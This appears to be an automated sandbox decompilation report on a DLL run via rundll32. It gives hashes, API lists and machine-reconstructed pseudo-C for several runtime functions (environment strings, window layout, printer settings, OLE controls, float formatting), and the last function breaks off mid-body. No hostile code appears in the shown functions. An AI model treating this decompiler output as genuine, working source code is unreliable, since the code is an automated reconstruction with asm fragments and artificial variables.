Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Info$ByteCharMultiWide_strlen
String ID:
API String ID: 1335377746-0
Opcode ID: a1739f8af5073df943149c03816b326863122fdfa87c5946c56ad2dc74c300ca
Instruction ID: 70101fa7554b3a37292e61141452f95f373fba0d19c42cfe0f4ebf6b77a3f96e
Opcode Fuzzy Hash: a1739f8af5073df943149c03816b326863122fdfa87c5946c56ad2dc74c300ca
Instruction Fuzzy Hash: 99514671900619ABDF21CFA5DC84D9EBBF9FF867A0B24411AF814AA190D7309DC1CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1001666B Relevance: 12.1, APIs: 8, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E1001666B() {
				int _v4;
				int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t7;
				CHAR* _t8;
				WCHAR* _t16;
				int _t19;
				char* _t23;
				int _t24;
				long _t28;
				int _t29;
				void* _t34;
				WCHAR* _t36;
				CHAR* _t37;
				intOrPtr _t38;
				int _t40;

				_t7 =  *0x1004f700; // 0x1
				_t29 = 0;
				_t36 = 0;
				_t38 = 2;
				if(_t7 != 0) {
					L6:
					__eflags = _t7 - 1;
					if(__eflags != 0) {
						__eflags = _t7 - _t38;
						if(_t7 == _t38) {
							L21:
							_t8 = GetEnvironmentStrings();
							_t37 = _t8;
							__eflags = _t37 - _t29;
							if(_t37 == _t29) {
								L20:
								return 0;
							}
							__eflags =  *_t37 - _t29;
							if( *_t37 == _t29) {
								L25:
								_t39 = _t8 - _t37 + 1;
								_t34 = E100107B6(_t8 - _t37 + 1);
								__eflags = _t34 - _t29;
								if(_t34 != _t29) {
									E10011440(_t34, _t37, _t39);
								} else {
									_t34 = 0;
								}
								FreeEnvironmentStringsA(_t37);
								return _t34;
							} else {
								goto L23;
							}
							do {
								do {
									L23:
									_t8 =  &(_t8[1]);
									__eflags =  *_t8 - _t29;
								} while ( *_t8 != _t29);
								_t8 =  &(_t8[1]);
								__eflags =  *_t8 - _t29;
							} while ( *_t8 != _t29);
							goto L25;
						}
						__eflags = _t7 - _t29;
						if(_t7 == _t29) {
							goto L21;
						}
						goto L20;
					}
					L7:
					if(_t36 != _t29) {
						L9:
						_t16 = _t36;
						if( *_t36 == _t29) {
							L12:
							_t19 = (_t16 - _t36 >> 1) + 1;
							_v4 = _t19;
							_t40 = WideCharToMultiByte(_t29, _t29, _t36, _t19, _t29, _t29, _t29, _t29);
							if(_t40 != _t29) {
								_t23 = E100107B6(_t40);
								_v8 = _t23;
								if(_t23 != _t29) {
									_t24 = WideCharToMultiByte(_t29, _t29, _t36, _v4, _t23, _t40, _t29, _t29);
									_t52 = _t24;
									if(_t24 == 0) {
										_push(_v8);
										E100107C8(_t29, WideCharToMultiByte, _t36, _t52);
										_v8 = _t29;
									}
									_t29 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t36);
							return _t29;
						} else {
							goto L10;
						}
						do {
							do {
								L10:
								_t16 = _t16 + _t38;
							} while ( *_t16 != _t29);
							_t16 = _t16 + _t38;
						} while ( *_t16 != _t29);
						goto L12;
					}
					_t36 = GetEnvironmentStringsW();
					if(_t36 == _t29) {
						goto L20;
					}
					goto L9;
				}
				_t36 = GetEnvironmentStringsW();
				if(_t36 == 0) {
					_t28 = GetLastError();
					__eflags = _t28 - 0x78;
					if(_t28 != 0x78) {
						_t7 =  *0x1004f700; // 0x1
					} else {
						_t7 = _t38;
						 *0x1004f700 = _t7;
					}
					goto L6;
				} else {
					 *0x1004f700 = 1;
					goto L7;
				}
			}

APIs

GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016687
GetLastError.KERNEL32(?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001669B
GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100166BD
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,10011248), ref: 100166F1
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10011248,?,?), ref: 10016713
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001672C
GetEnvironmentStrings.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016742
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 1001677E

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
String ID:
API String ID: 883850110-0
Opcode ID: bfeabb1aff3bc99bbfe24a1f77970b714d91aefed0498c732c899eb5009dd72e
Instruction ID: 9752ab07c098c977bc575d501e7eaa0deb9efe59c3b15e47417eb48d6ecdcefd
Opcode Fuzzy Hash: bfeabb1aff3bc99bbfe24a1f77970b714d91aefed0498c732c899eb5009dd72e
Instruction Fuzzy Hash: 7831A5B260D26A6FE311EF654CC882BBADCEB4E1D8712092DF681CB191D671DCC496A1

Uniqueness

Uniqueness Score: -1.00%

Function 10022499 Relevance: 12.1, APIs: 8, Instructions: 124
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10022499(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagRECT _v36;
				void* _v40;
				void* __ebp;
				signed int _t61;
				int _t62;
				signed short _t63;
				void* _t64;
				void* _t72;
				intOrPtr* _t85;
				signed int _t87;
				struct HWND__* _t91;
				void* _t92;

				_t72 = __ecx;
				_v8 = 0;
				_v12 = _a28;
				_v16 = 0;
				_v20 = 0;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x1c),  &_v36);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				_t61 = _a16 & 0xffff7fff;
				_a24 = _t61;
				if(_t61 == 1) {
					_v40 = _v40 & 0x00000000;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
				_t62 = GetTopWindow( *(_t72 + 0x1c));
				while(1) {
					_t91 = _t62;
					if(_t91 == 0) {
						break;
					}
					_t63 = GetDlgCtrlID(_t91);
					_push(_t91);
					_t87 = _t63 & 0x0000ffff;
					_t64 = E10022115();
					if(_t87 != _a12) {
						if(_t87 >= _a4 && _t87 <= _a8 && _t64 != 0) {
							SendMessageA(_t91, 0x361, 0,  &_v40);
						}
					} else {
						_v8 = _t91;
					}
					_t62 = GetWindow(_t91, 2);
				}
				if(_a24 != 1) {
					if(_a12 != 0 && _v8 != 0) {
						_t62 = E100220EE(_t92, _v8);
						if(_a24 == 2) {
							_t85 = _a20;
							_v36.left = _v36.left +  *_t85;
							_v36.top = _v36.top +  *((intOrPtr*)(_t85 + 4));
							_v36.right = _v36.right -  *((intOrPtr*)(_t85 + 8));
							_v36.bottom = _v36.bottom -  *((intOrPtr*)(_t85 + 0xc));
						}
						if((_a17 & 0x00000080) == 0) {
							 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
							_t62 = E10020D81( &_v40, _v8,  &_v36);
						}
					}
					if(_v40 != 0) {
						_t62 = EndDeferWindowPos(_v40);
					}
				} else {
					if(_a28 == 0) {
						_t62 = _a20;
						 *((intOrPtr*)(_t62 + 8)) = _v20;
						 *((intOrPtr*)(_t62 + 4)) = 0;
						 *_t62 = 0;
						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
					} else {
						_t62 = CopyRect(_a20,  &_v36);
					}
				}
				return _t62;
			}

APIs

GetClientRect.USER32 ref: 100224CC
BeginDeferWindowPos.USER32(00000008), ref: 100224E4
GetTopWindow.USER32(?), ref: 100224F6
GetDlgCtrlID.USER32 ref: 10022501
SendMessageA.USER32 ref: 10022533
GetWindow.USER32(00000000,00000002), ref: 1002253C
CopyRect.USER32 ref: 1002255A
EndDeferWindowPos.USER32(00000000), ref: 100225D4

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
String ID:
API String ID: 1228040700-0
Opcode ID: 42fbaed3706ff63598f5f0fcd2255645fe957362c4a3063a48a191e489ec859f
Instruction ID: a778dc46a9958f4d0915ef63e23ed223fa2105f0a807d6ecff0719afcf2b0a04
Opcode Fuzzy Hash: 42fbaed3706ff63598f5f0fcd2255645fe957362c4a3063a48a191e489ec859f
Instruction Fuzzy Hash: D741477190062AEFCF11DFD4E8A49EEB7B5FF08340B51816AF905A7251C734AA50CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002535C Relevance: 12.1, APIs: 8, Instructions: 81
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002535C(void* __ebx, void* __edi, void* __esi, char* _a4, CHAR* _a8) {
				intOrPtr _v8;
				short _v528;
				short _v1048;
				short _v1568;
				intOrPtr _t18;
				int _t20;
				int _t21;
				void* _t23;
				char* _t32;
				int _t37;
				char* _t42;
				void* _t47;
				void* _t49;

				_t18 =  *0x1004c470; // 0x12db9c4b
				_t42 = _a4;
				_v8 = _t18;
				if(lstrcmpiA(_t42, _a8) == 0) {
					_t20 = GetSystemMetrics(0x2a);
					if(_t20 != 0) {
						_t21 = lstrlenA(_t42);
						if(_t21 != lstrlenA(_a8)) {
							L13:
							_t23 = 0;
						} else {
							_t37 = GetThreadLocale();
							GetStringTypeA(_t37, 1, _t42, 0xffffffff,  &_v528);
							GetStringTypeA(_t37, 4, _t42, 0xffffffff,  &_v1048);
							GetStringTypeA(_t37, 1, _a8, 0xffffffff,  &_v1568);
							_t32 = _t42;
							if( *_t42 == 0) {
								L10:
								_t23 = 1;
							} else {
								_t47 = 0;
								while(( *(_t49 + _t47 - 0x414) & 0x00000080) == 0 ||  *((intOrPtr*)(_t49 + _t47 - 0x20c)) ==  *((intOrPtr*)(_t49 + _t47 - 0x61c))) {
									_t47 = _t47 + 2;
									if( *_t32 != 0) {
										continue;
									} else {
										goto L10;
									}
									goto L11;
								}
								goto L13;
							}
						}
						L11:
					} else {
						_t23 = _t20 + 1;
					}
				} else {
					_t23 = 0;
				}
				return E100117AE(_t23, _v8);
			}

APIs

lstrcmpiA.KERNEL32(?,00000000), ref: 10025375
GetSystemMetrics.USER32 ref: 10025388

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MetricsSystemlstrcmpi
String ID:
API String ID: 2335526769-0
Opcode ID: 1cbe2259d2c1a5909c7395cdd660f50db29ee15dbb1b64e3fa85e708783875df
Instruction ID: 2e24e30c7814501e8ef39cdb76116c26bdbe99ae311f6264528fd307033058d9
Opcode Fuzzy Hash: 1cbe2259d2c1a5909c7395cdd660f50db29ee15dbb1b64e3fa85e708783875df
Instruction Fuzzy Hash: BD21677150022D7ADB01EBB09C44FDEBBACEB453B2FA08661FC12D61C1D6718E818B64

Uniqueness

Uniqueness Score: -1.00%

Function 1001F60C Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1001F60C(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x70);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x6c);
							if( *(_t35 + 0x6c) != 0) {
								E10029C1B(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x6c) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E10029C1B( *(_t35 + 0x6c));
								 *(_t35 + 0x6c) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

APIs

GlobalLock.KERNEL32 ref: 1001F629
lstrcmpA.KERNEL32(?,?), ref: 1001F635
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1001F647
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001F667
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1001F66F
GlobalLock.KERNEL32 ref: 1001F679
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1001F686
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1001F69E

Part of subcall function 10029C1B: GlobalFlags.KERNEL32(?), ref: 10029C25
Part of subcall function 10029C1B: GlobalUnlock.KERNEL32(?,00000000,?,1001F698,?,00000000,?,?,00000000,00000000,00000002), ref: 10029C36
Part of subcall function 10029C1B: GlobalFree.KERNEL32 ref: 10029C41

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: c3571f4809fef0992d903921779ddd8b1d2f29fd1f502d0743ce459bc184c30f
Instruction ID: 2a491371b327142203fc8723eb74c2771e75d1908c59da801caef355c7fd3301
Opcode Fuzzy Hash: c3571f4809fef0992d903921779ddd8b1d2f29fd1f502d0743ce459bc184c30f
Instruction Fuzzy Hash: 61118E76500208BEDB12DBAACC86D7F7AFDEF85784B50081DF645EA122D671ED80DB24

Uniqueness

Uniqueness Score: -1.00%

Function 100074F2 Relevance: 10.7, APIs: 7, Instructions: 247
memoryCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E100074F2(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t132;
				int* _t133;
				int _t138;
				intOrPtr* _t139;
				int _t142;
				int* _t143;
				int _t146;
				int _t171;
				intOrPtr _t172;
				int _t173;
				intOrPtr _t178;
				int _t183;
				int _t186;
				void* _t187;
				int* _t191;
				void* _t213;
				int* _t216;
				short _t217;
				intOrPtr* _t225;
				void* _t227;
				struct tagRECT _t228;
				int* _t229;
				signed int _t233;
				int* _t235;
				int* _t237;
				int* _t238;
				void* _t239;

				_t227 = __esi;
				E10011BF0(0x1003a548, _t239);
				_t132 =  *0x1004c470; // 0x12db9c4b
				_t225 =  *((intOrPtr*)(_t239 + 0x14));
				 *((intOrPtr*)(_t239 - 0x10)) = _t132;
				_t183 = 0;
				_t133 = _t225 + 0x12;
				 *(_t239 - 0x34) = _t133;
				if( *(_t239 + 0x10) != 0) {
					 *((intOrPtr*)(_t239 - 0x58)) =  *((intOrPtr*)(_t225 + 8));
					 *((intOrPtr*)(_t239 - 0x54)) =  *((intOrPtr*)(_t225 + 4));
					 *((short*)(_t239 - 0x50)) =  *((intOrPtr*)(_t225 + 0xc));
					 *((short*)(_t239 - 0x4e)) =  *((intOrPtr*)(_t225 + 0xe));
					 *((short*)(_t239 - 0x4a)) =  *_t133;
					_t216 = _t225 + 0x18;
					 *((short*)(_t239 - 0x4c)) =  *(_t225 + 0x10);
					 *((short*)(_t239 - 0x48)) =  *((intOrPtr*)(_t225 + 0x14));
					_t225 = _t239 - 0x58;
					 *(_t239 - 0x34) = _t216;
				}
				_t217 =  *((short*)(_t225 + 0xa));
				_push(_t227);
				_t228 =  *((short*)(_t225 + 8));
				 *((intOrPtr*)(_t239 - 0x5c)) =  *((short*)(_t225 + 0xe)) + _t217;
				 *(_t239 - 0x68) = _t228;
				 *((intOrPtr*)(_t239 - 0x64)) = _t217;
				 *((intOrPtr*)(_t239 - 0x60)) =  *((short*)(_t225 + 0xc)) + _t228;
				_t138 = MapDialogRect( *( *((intOrPtr*)(_t239 + 8)) + 0x1c), _t239 - 0x68);
				_t229 =  *(_t239 + 0x1c);
				 *(_t239 - 0x28) = _t183;
				if( *((intOrPtr*)(_t239 + 0x20)) >= 4) {
					_t186 =  *_t229;
					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - 4;
					_t229 =  &(_t229[1]);
					if(_t186 > 0) {
						__imp__#4(_t229, _t186);
						_t187 = _t186 + _t186;
						_t229 = _t229 + _t187;
						 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t187;
						 *(_t239 - 0x28) = _t138;
					}
					_t183 = 0;
				}
				 *(_t239 - 0x2c) = _t183;
				_t139 = E100243B2();
				_t218 =  *_t139;
				 *((intOrPtr*)(_t239 + 0x14)) =  *((intOrPtr*)( *_t139 + 0xc))() + 0x10;
				 *(_t239 - 4) = _t183;
				 *(_t239 - 0x38) = _t183;
				 *(_t239 - 0x3c) = _t183;
				 *(_t239 - 0x30) = _t183;
				if( *((short*)(_t239 + 0x18)) == 0x37a ||  *((short*)(_t239 + 0x18)) == 0x37b) {
					_t142 =  *_t229;
					_t49 = _t142 - 0xc; // -28
					_t191 = _t49;
					_t229 =  &(_t229[3]);
					 *(_t239 - 0x40) = _t142;
					 *(_t239 + 0x1c) = _t191;
					if(_t191 > _t183) {
						do {
							_t171 =  *_t229;
							 *(_t239 + 0x1c) =  *(_t239 + 0x1c) - 6;
							_t235 =  &(_t229[1]);
							_t229 =  &(_t235[0]);
							 *(_t239 - 0x44) = _t171;
							 *(_t239 + 0x10) =  *_t235;
							if(_t171 != 0x80010001) {
								_t172 = E1001F77E(0x1c);
								 *((intOrPtr*)(_t239 - 0x6c)) = _t172;
								__eflags = _t172 - _t183;
								 *(_t239 - 4) = 1;
								if(_t172 == _t183) {
									_t173 = 0;
									__eflags = 0;
								} else {
									_t173 = E1000B256(_t172,  *(_t239 - 0x2c),  *(_t239 - 0x44),  *(_t239 + 0x10));
								}
								 *(_t239 - 4) = 0;
								 *(_t239 - 0x2c) = _t173;
							} else {
								_t237 =  &(_t229[1]);
								 *(_t239 - 0x3c) =  *_t229;
								_t238 =  &(_t237[3]);
								 *(_t239 - 0x30) =  *_t237;
								E10006AEC(_t239 + 0x14, _t238);
								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t239 + 0x14)) - 0xc));
								_t213 = 0xffffffef;
								 *(_t239 + 0x1c) =  *(_t239 + 0x1c) + _t213 - _t178;
								_t229 = _t238 + _t178 + 1;
								 *(_t239 - 0x38) =  *(_t239 + 0x10);
							}
						} while ( *(_t239 + 0x1c) > _t183);
						_t142 =  *(_t239 - 0x40);
					}
					 *((intOrPtr*)(_t239 + 0x20)) =  *((intOrPtr*)(_t239 + 0x20)) - _t142;
					 *((intOrPtr*)(_t239 + 0x18)) =  *((intOrPtr*)(_t239 + 0x18)) + 0xfffc;
				}
				_t143 =  *(_t239 - 0x34);
				_t256 =  *_t143 - 0x7b;
				_push(_t239 - 0x20);
				_push(_t143);
				if( *_t143 != 0x7b) {
					__imp__CLSIDFromProgID();
				} else {
					__imp__CLSIDFromString();
				}
				_push(_t183);
				_push( *((intOrPtr*)(_t239 + 0x20)));
				_push(_t229);
				 *(_t239 + 0x1c) = _t143;
				E1002EC6C(_t239 - 0x94, _t256);
				 *(_t239 - 4) = 2;
				 *(_t239 - 0x24) = _t183;
				asm("sbb esi, esi");
				_t233 =  ~( *((intOrPtr*)(_t239 + 0x18)) - 0x378) & _t239 - 0x00000094;
				if( *(_t239 + 0x1c) >= _t183 && E100090DE( *((intOrPtr*)(_t239 + 8))) != 0 && E10009A9F( *((intOrPtr*)( *((intOrPtr*)(_t239 + 8)) + 0x48)), _t183, _t239 - 0x20, _t183,  *_t225, _t239 - 0x68,  *(_t225 + 0x10) & 0x0000ffff, _t233, 0 |  *((short*)(_t239 + 0x18)) == 0x00000377,  *(_t239 - 0x28), _t239 - 0x24) != 0) {
					E1000A762( *(_t239 - 0x24), 1);
					SetWindowPos( *( *(_t239 - 0x24) + 0x20),  *(_t239 + 0xc), _t183, _t183, _t183, _t183, 0x13);
					 *( *(_t239 - 0x24) + 0x90) =  *(_t239 - 0x2c);
					E100074A5(_t183,  *(_t239 - 0x24) + 0xa0, _t239, _t239 + 0x14);
					 *((short*)( *(_t239 - 0x24) + 0x94)) =  *(_t239 - 0x38);
					 *( *(_t239 - 0x24) + 0x98) =  *(_t239 - 0x3c);
					 *( *(_t239 - 0x24) + 0x9c) =  *(_t239 - 0x30);
				}
				if( *(_t239 - 0x28) != _t183) {
					__imp__#6( *(_t239 - 0x28));
				}
				_t146 =  *(_t239 - 0x24);
				if(_t146 == _t183) {
					 *( *(_t239 + 0x24)) = _t183;
				} else {
					 *( *(_t239 + 0x24)) =  *(_t146 + 0x20);
					_t183 = 1;
				}
				 *(_t239 - 4) = 0;
				E1002EFD7(_t183, _t239 - 0x94, _t218);
				E100014B0( *((intOrPtr*)(_t239 + 0x14)) + 0xfffffff0, _t218);
				 *[fs:0x0] =  *((intOrPtr*)(_t239 - 0xc));
				return E100117AE(_t183,  *((intOrPtr*)(_t239 - 0x10)));
			}

APIs

__EH_prolog.LIBCMT ref: 100074F7
MapDialogRect.USER32(?,?), ref: 10007585
SysAllocStringLen.OLEAUT32(?,00000000), ref: 100075A6
CLSIDFromString.OLE32(?,00000004), ref: 100076A4
CLSIDFromProgID.OLE32(?,00000004), ref: 100076AC
SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,00000004,00000000,?,?,?,0000FC84,00000000), ref: 10007748
SysFreeString.OLEAUT32(?), ref: 1000779B

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: String$From$AllocDialogFreeH_prologProgRectWindow
String ID:
API String ID: 493809305-0
Opcode ID: 49f95f9342accb2b989199e6a3fe790c04b9925ae12edf67e65d2fb5adebfaa9
Instruction ID: 430f13df2ed8550076e5f7c2e9f31eb497c55eb67174fe5e7936e43fbe5827de
Opcode Fuzzy Hash: 49f95f9342accb2b989199e6a3fe790c04b9925ae12edf67e65d2fb5adebfaa9
Instruction Fuzzy Hash: F5A12475D00619DFDB04CFA8C884AEDBBF4FF08344F118529E819AB251E735AE90CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001BC3A Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 228
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E1001BC3A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed short* _a24) {
				intOrPtr _v8;
				char _v9;
				signed int _v10;
				signed int _v14;
				signed int _v18;
				signed short _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v44;
				signed int _v48;
				signed short* _v52;
				intOrPtr _t87;
				signed int _t88;
				signed short* _t99;
				intOrPtr* _t100;
				signed int _t101;
				signed short _t103;
				signed int _t105;
				signed short* _t131;
				signed int _t133;
				signed int _t139;
				signed short* _t141;
				signed short _t149;
				signed int _t151;
				signed int _t152;
				signed int _t159;
				signed int _t161;
				signed int _t164;
				void* _t165;
				void* _t166;

				_t87 =  *0x1004c470; // 0x12db9c4b
				_v8 = _t87;
				_t88 = _a12;
				_t131 = _a24;
				_t133 = _t88 & 0x00008000;
				_v32 = 0xcc;
				_v31 = 0xcc;
				_v30 = 0xcc;
				_v29 = 0xcc;
				_v28 = 0xcc;
				_v27 = 0xcc;
				_v26 = 0xcc;
				_v25 = 0xcc;
				_v24 = 0xcc;
				_v23 = 0xcc;
				_v22 = 0xfb;
				_v21 = 0x3f;
				_v48 = 1;
				_t149 = _t88 & 0x00007fff;
				if(_t133 == 0) {
					_t131[1] = 0x20;
				} else {
					_t131[1] = 0x2d;
				}
				_t151 = _a8;
				if(_t149 != 0 || _t151 != 0 || _a4 != _t151) {
					if(_t149 != 0x7fff) {
						_t90 = _t149 & 0x0000ffff;
						_v20 = _v20 & 0x00000000;
						_v18 = _a4;
						_t159 = (((_t149 & 0x0000ffff) >> 8) + (_t151 >> 0x18) * 2) * 0x4d + _t90 * 0x4d10 - 0x134312f4 >> 0x10;
						_v10 = _t149;
						_v14 = _t151;
						E1001C383(_t131, _t151, _t159,  &_v20,  ~_t159, 1);
						_t166 = _t165 + 0xc;
						__eflags = _v10 - 0x3fff;
						if(_v10 >= 0x3fff) {
							_t159 = _t159 + 1;
							__eflags = _t159;
							E1001C151(_t131, _t151, _t159,  &_v20,  &_v32);
						}
						__eflags = _a20 & 0x00000001;
						_t152 = _a16;
						 *_t131 = _t159;
						if((_a20 & 0x00000001) == 0) {
							L27:
							__eflags = _t152 - 0x15;
							if(_t152 > 0x15) {
								_t152 = 0x15;
							}
							_t161 = (_v10 & 0x0000ffff) - 0x3ffe;
							_t52 =  &_v10;
							 *_t52 = _v10 & 0x00000000;
							__eflags =  *_t52;
							_a12 = 8;
							do {
								E1001B6CD( &_v20);
								_t56 =  &_a12;
								 *_t56 = _a12 - 1;
								__eflags =  *_t56;
							} while ( *_t56 != 0);
							__eflags = _t161;
							if(_t161 < 0) {
								_t164 =  ~_t161 & 0x000000ff;
								__eflags = _t164;
								if(_t164 > 0) {
									do {
										E1001B6FB( &_v20);
										_t164 = _t164 - 1;
										__eflags = _t164;
									} while (_t164 != 0);
								}
							}
							_t59 = _t152 + 1; // 0xcd
							_t139 = _t59;
							__eflags = _t139;
							_t99 =  &(_t131[2]);
							_v52 = _t99;
							if(_t139 > 0) {
								_a12 = _t139;
								do {
									asm("movsd");
									asm("movsd");
									asm("movsd");
									E1001B6CD( &_v20);
									E1001B6CD( &_v20);
									E1001B66F(__eflags,  &_v20,  &_v44);
									E1001B6CD( &_v20);
									_t166 = _t166 + 0x14;
									_v52 =  &(_v52[0]);
